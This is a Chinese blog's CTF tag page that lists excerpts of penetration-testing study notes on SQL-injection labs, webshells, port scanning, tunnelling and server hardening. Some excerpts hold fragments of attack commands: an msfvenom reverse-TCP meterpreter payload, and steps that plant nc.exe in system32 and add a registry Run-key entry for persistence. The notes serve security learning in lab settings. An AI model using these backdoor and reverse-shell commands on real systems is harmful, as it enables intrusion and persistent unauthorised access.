Maxon's Blog
标签/CTF

CTF

16 篇文章

windows本地靶场--Sqli-Labs(环境搭建)

windows本地靶场SqliLabs(环境搭建) 往往很多新手在刚学习 SQL 注入的时候,都需要拥有一个能 SQL 注入的网站,需要有 SQL 注入点的。直接去互联网上找的话对新手未免有点太难了,因此:我们一般都是在本地搭建一个能 SQL 注入测试的网站,那样我们学习 SQL 注入就容易多了。 由于本地能搭建 SQL 注入的平台或程序太多了,今天我主推一个:SQLiLabs; 下面就给大家讲一...

2021年3月21日5

T3SEC总结

T3SEC总结 主题:揭秘黑客如何通过木马控制目标服务器webshell 学习前需要了解的内容: 1.了解web的基础的原理(http协议...) 2.对安全工具有一定的了解(burpsuite.中国菜刀等) 靶机:uploadlabs webshell是什么:其实就是一个网页木马 分析: 1.分析上传点: 这是一个js过滤,前端过滤,所有前端过滤都是不安全的.checkFile()...

2020年6月26日11

T3sec 学习笔记—–第十四讲-python-nmap

T3SEC —–第十三讲:pythonnmap Nmap–扫描网上电脑开放的连接端口 可用于评估系统漏洞 案例前提条件: python基础 pip TCP/IP Python 3.7.x pythonnmap portscanner() 扫描 portscannerhostdict() 返回结果 实现内网端口扫描工具 python 准备工作: windows: n...

2020年6月25日1

T3sec 学习笔记—–第十一讲-自编木马实战

T3SEC —–第十一讲:自编木马实战 自编 进入环境后可不依赖其他工具 自编远程控制电脑木马 涉及知识或技术: 操作系统 win/linux/unix/android ........ 命令,服务,特性. 网络协议 osi七层网络 tcp/ip 协议族群 应用层 传输层:tcp/udp 网络层 链路层 实用的程序语言 python go ruby htm...

2020年6月14日6

T3sec 学习笔记—–第十二讲-阻网

T3SEC —–第十二讲:阻网小军刀 实战自编阻网小军刀/木马/蠕虫 岗位: 等保测评网络安全,系统安全,web渗透工具.对数据库,网络等的渗透攻防 安全运维网络系统维护,保护防止黑客攻击. 网络安全,系统安全 web渗透,渗透实战 渗透测试模拟黑客攻击,挖掘漏洞,隐患 并提出意见.web安全编程,web渗透,渗透实战,python黑帽子 攻防工程师黑帽子,白帽子.网络安全 ,系统安全,w...

2020年6月12日1

T3sec 学习笔记—–第十三讲-webshell

T3SEC —–第十三讲:webshell webshell,截屏远程控制利器 技术分解: webspp:web应用 http:80/https:443/ws:80/wss:443 通信协议: http(https)/tcp/udp/ws(wss) cmd/shell等 html/css/js等 python/asp/php/jsp等 二进制等 流控制等 webshell...

2020年6月10日3

T3sec 学习笔记—–第九讲-内网转发穿透

T3SEC —–第九讲:内网转发穿透 内网穿透和代理转发 一.内网穿透 花生壳 frp 等...... 内网穿透获取内网服务器的session 配置frp穿透 https://github.com/fatedier/frp 22==6000 4444==6002 使用木马反弹session msfvenom p windows/meterpreter/reversetcp L...

2020年5月18日3

T3sec 学习笔记—–第八讲-nc后门

T3SEC —–第八讲:nc后门 隐藏后门 1.nc后门上传 upload/root/nc.exe c:\\\windows\\system32 2.修改注册表 reg enumkey k HKLM\\softfware\\microsoft\\windows\\currentversion\\run reg setval k HKLM\\software\\microsoft\\w...

2020年5月18日3

T3sec 学习笔记—–第十讲-服务器安全加固

T3SEC —–第十讲:服务器安全加固 长城网络靶场竞技系统 实验吧 ctf训练营 各体系路线 1.网络安全:协议分析,企业网络安全架构设计项目实战 2.系统安全:系统加固,入侵排查,应急响应 3.web安全编程:http,php,java,数据库安全 4.web渗透工具:工具,SRC,漏洞挖掘,代码审计,web渗透测试项目实战  5.渗透实战:主机渗透,内网渗透,python渗透编程,...

2020年5月17日7